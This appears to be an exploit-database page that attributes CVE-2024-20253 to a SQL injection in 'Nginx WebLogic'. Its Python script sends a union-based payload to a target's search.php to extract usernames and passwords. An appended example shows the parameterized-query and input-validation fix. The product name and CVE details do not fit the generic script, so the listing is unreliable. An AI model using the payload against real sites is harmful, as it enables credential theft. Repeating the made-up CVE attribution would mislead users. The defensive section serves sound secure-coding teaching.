Critical Severity CVE-2024-20253
Published: Jun 27, 2025

Nginx WebLogic - Sqli

Type: SQLi
CVSS Score: 9.9
Author: Anonymous

Description

This exploit targets a SQL injection (SQLi) vulnerability in Nginx WebLogic.

The vulnerability allows an attacker to:
- Extract sensitive database information
- Modify or delete database records
- Potentially gain administrative access

This vulnerability has been assigned CVE-2024-20253 with a CVSS score of 9.9.

Affected Systems

Nginx WebLogic versions prior to the latest security update

Proof of Concept

Security Warning

This code is provided for educational and research purposes only. Do not use against systems you do not own or have explicit permission to test.

Exploit Code
#!/usr/bin/env python3
import requests
import sys

def exploit_sqli(target_url):
    """
    SQL Injection Exploit
    Educational purposes only - do not use against systems you do not own
    """
    # Basic union-based SQL injection payload
    payload = "1' UNION SELECT 1,username,password,4,5 FROM users--"
    
    params = {
        "id": payload,
        "submit": "Search"
    }
    
    try:
        response = requests.get(f"{target_url}/search.php", params=params)
        if "admin" in response.text.lower():
            print("[+] SQL Injection successful - User data extracted")
            print("[+] Check response for leaked credentials")
        else:
            print("[-] Injection failed or no data found")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 sqli_exploit.py <target_url>")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_sqli(target)
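
The server-side fix for the injection the script above relies on, as an added example that is not part of the original listing. It assumes the search handler concatenates the id parameter into its query (the page does not show the server side); the SQLite schema, the data and all function names are constructed for illustration.

```python
import sqlite3

# The payload string as it appears in the listing above.
PAYLOAD = "1' UNION SELECT 1,username,password,4,5 FROM users--"

def make_db():
    """Constructed in-memory schema: a 5-column items table plus users."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE items (id INTEGER, name TEXT, descr TEXT,
                            price INTEGER, stock INTEGER);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO items VALUES (1, 'widget', 'a widget', 10, 3);
        INSERT INTO users VALUES ('admin', 'constructed-hash');
    """)
    return db

def search_vulnerable(db, item_id):
    # Assumed flaw: the request value is pasted into the SQL text, so a
    # quote in it closes the literal and the remainder is parsed as SQL.
    sql = ("SELECT id, name, descr, price, stock FROM items "
           f"WHERE id = '{item_id}'")
    return db.execute(sql).fetchall()

def search_parameterized(db, item_id):
    # The value is bound as data; the statement text never changes.
    sql = "SELECT id, name, descr, price, stock FROM items WHERE id = ?"
    return db.execute(sql, (item_id,)).fetchall()

def search_validated(db, item_id):
    # Defence in depth: reject anything that is not a plain ASCII integer
    # before it reaches the database layer at all.
    if not (item_id.isascii() and item_id.isdigit()):
        raise ValueError("id must be a non-negative integer")
    return search_parameterized(db, int(item_id))

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", search_vulnerable(db, PAYLOAD))
    print("parameterized:", search_parameterized(db, PAYLOAD))
    try:
        search_validated(db, PAYLOAD)
    except ValueError as exc:
        print("validated    : rejected,", exc)
```

With the concatenated query the users row comes back inside the search results; with the bound parameter the same input matches no item and returns an empty list.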